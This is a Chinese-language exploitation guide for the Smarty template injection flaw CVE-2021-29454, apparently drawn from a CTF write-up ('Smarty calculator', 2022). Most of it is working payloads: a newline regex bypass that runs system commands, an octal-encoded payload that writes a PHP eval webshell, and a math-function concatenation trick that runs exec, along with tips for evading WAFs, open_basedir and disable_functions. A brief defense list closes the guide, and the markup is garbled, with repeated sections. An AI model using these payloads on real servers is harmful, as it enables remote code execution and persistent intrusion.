Smarty模板注入漏洞(CVE-2021-29454)分析与利用指南<\/h1>

漏洞概述<\/h2>

Smarty是PHP的模板引擎，用于分离表示层(HTML\/CSS)与应用程序逻辑。在3.1.42和4.0.2版本之前，存在一个模板注入漏洞，允许攻击者通过恶意构造的数学字符串执行任意PHP代码。<\/p>

影响版本<\/strong>：<\/p>

Smarty 3.x < 3.1.42<\/li>
Smarty 4.x < 4.0.2<\/li> <\/ul>
漏洞原理<\/h2>
漏洞位于\/plugins\/function.math.php<\/code>文件中，未对数学函数的输入进行充分过滤。攻击者可以通过精心构造的数学表达式实现代码注入。<\/p>
修复对比<\/h3> 官方在修复版本中添加了以下过滤代码：<\/p> \/\/ Remove whitespaces <\/span><\/span><\/span><\/span>$equation =<\/span> preg_replace<\/span>('\/\s+\/'<\/span>, ''<\/span>, $equation); <\/span><\/span> <\/span><\/span>\/\/ Adapted from https:\/\/www.php.net\/manual\/en\/function.eval.php#107377 <\/span><\/span><\/span><\/span>$number =<\/span> '(?:\d+(?:\.\d+)?|pi|π)'<\/span>; \/\/ What is a number <\/span><\/span><\/span><\/span>$functionsOrVars =<\/span> '((?:0x[a-fA-F0-9]+)|([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*))'<\/span>; <\/span><\/span>$operators =<\/span> '[+\-\*\\/%^&|]'<\/span>; \/\/ Allowed math operators <\/span><\/span><\/span><\/span>$regexp =<\/span> '\/^('<\/span>.<\/span>$number.<\/span>'|'<\/span>.<\/span>$functionsOrVars.<\/span>'|('<\/span>.<\/span>$functionsOrVars.<\/span>'\s*$(?1)*$)|$(?1)*$|'<\/span>.<\/span>$operators.<\/span>')*$\/'<\/span>; <\/span><\/span> <\/span><\/span>if<\/span> (!<\/span>preg_match<\/span>($regexp, $equation)) { <\/span><\/span> trigger_error<\/span>("math: illegal characters"<\/span>, E_USER_WARNING<\/span>); <\/span><\/span> return<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞利用方法<\/h2> 姿势一：换行绕过正则<\/h3> 设置Cookie：login=1<\/code><\/li> POST传参（URL编码）： {math equation="x\n).system('id');\/\/" x=1} <\/code><\/pre> <\/li> 绕过disable_functions<\/code>和open_basedir<\/code>限制：使用symlink()<\/code>函数创建符号链接<\/li> 或使用ini_set()<\/code>临时修改open_basedir<\/code><\/li> <\/ul> <\/li> <\/ol> 姿势二：八进制编码执行<\/h3> 使用八进制编码直接写入一句话木马：<\/p> eval:{$x="42"}{math equation="(\"\\146\\151\\154\\145\\137\\160\\165\\164\\137\\143\\157\\156\\164\\145\\156\\164\\163\")(\"\\141\\56\\160\\150\\160\",\"\\74\\77\\160\\150\\160\\40\\145\\166\\141\\154\\50\\44\\137\\122\\105\\121\\125\\105\\123\\124\\133\\47\\120\\141\\143\\153\\47\\135\\51\\73\\77\\76\")"} <\/code><\/pre> 解码后相当于执行：<\/p> file_put_contents<\/span>("a.php"<\/span>, "<?php eval(<\/span>\$<\/span>_REQUEST['Pack']);?>"<\/span>); <\/span><\/span><\/code><\/pre>姿势三：数学函数拼接执行<\/h3> 利用数学函数名拼接执行命令：<\/p> {math equation="p;('exp'[0].'exp'[1].'exp'[0].'cos'[0])('cos'[0].'abs'[0].'tan'[0].'floor'[0].'floor'[1].'abs'[0].'log'[2].'>1');" p="1"} <\/code><\/pre> 解码后相当于执行：<\/p> exec<\/span>('cat \/flag'<\/span>)><\/span>1<\/span> <\/span><\/span><\/code><\/pre>实战案例：红明谷2022 Smarty calculator<\/h2> 环境分析<\/h3> 版本检测：{system('id')}<\/code>可返回Smarty版本3.1.39<\/li> 源码泄露：访问www.zip<\/code>获取源码<\/li> WAF过滤：检测php<\/code>、<<\/code>、flag<\/code>等关键字<\/li> 登录检查：需要设置login<\/code> Cookie<\/li> <\/ol> 绕过技巧<\/h3> WAF绕过<\/strong>：使用八进制编码或字符串拼接<\/li> 正则绕过<\/strong>：使用换行符\n<\/code>绕过正则检测<\/li> 安全限制绕过<\/strong>：使用symlink()<\/code>绕过open_basedir<\/code><\/li> 使用ini_set()<\/code>临时修改配置<\/li> <\/ul> <\/li> <\/ol> 完整利用步骤<\/h3> 设置Cookie：login=1<\/code><\/li> 发送Payload（选择一种方式）：直接执行命令： {math equation="x\n).system('cat \/flag');\/\/" x=1} <\/code><\/pre> <\/li> 写入Webshell： eval:{$x="42"}{math equation="(\"\\146\\151\\154\\145\\137\\160\\165\\164\\137\\143\\157\\156\\164\\145\\156\\164\\163\")(\"\\141\\56\\160\\150\\160\",\"\\74\\77\\160\\150\\160\\40\\145\\166\\141\\154\\50\\44\\137\\122\\105\\121\\125\\105\\123\\124\\133\\47\\120\\141\\143\\153\\47\\135\\51\\73\\77\\76\")"} <\/code><\/pre> <\/li> <\/ul> <\/li> 访问写入的Webshell获取flag<\/li> <\/ol> 防御措施<\/h2> 升级Smarty到最新版本(3.1.42+\/4.0.2+)<\/li> 对用户输入进行严格过滤<\/li> 禁用不必要的PHP函数<\/li> 设置合理的open_basedir<\/code><\/li> 使用安全的模板引擎配置<\/li> <\/ol> 参考链接<\/h2> 官方修复：https:\/\/github.com\/smarty-php\/smarty\/commit\/...<\/li> 漏洞详情：https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-29454<\/li> <\/ul>

Smarty模板注入漏洞(CVE-2021-29454)分析与利用指南<\/h1>

漏洞原理<\/h2> 漏洞位于\/plugins\/function.math.php<\/code>文件中，未对数学函数的输入进行充分过滤。攻击者可以通过精心构造的数学表达式实现代码注入。<\/p>

漏洞利用方法<\/h2>

实战案例：红明谷2022 Smarty calculator<\/h2>

参考链接<\/h2> 官方修复：https:\/\/github.com\/smarty-php\/smarty\/commit\/...<\/li> 漏洞详情：https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-29454<\/li> <\/ul>

漏洞原理<\/h2>
漏洞位于`\/plugins\/function.math.php<\/code>文件中，未对数学函数的输入进行充分过滤。攻击者可以通过精心构造的数学表达式实现代码注入。<\/p>`

参考链接<\/h2>

官方修复：https:\/\/github.com\/smarty-php\/smarty\/commit\/...<\/li>
漏洞详情：https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-29454<\/li> <\/ul>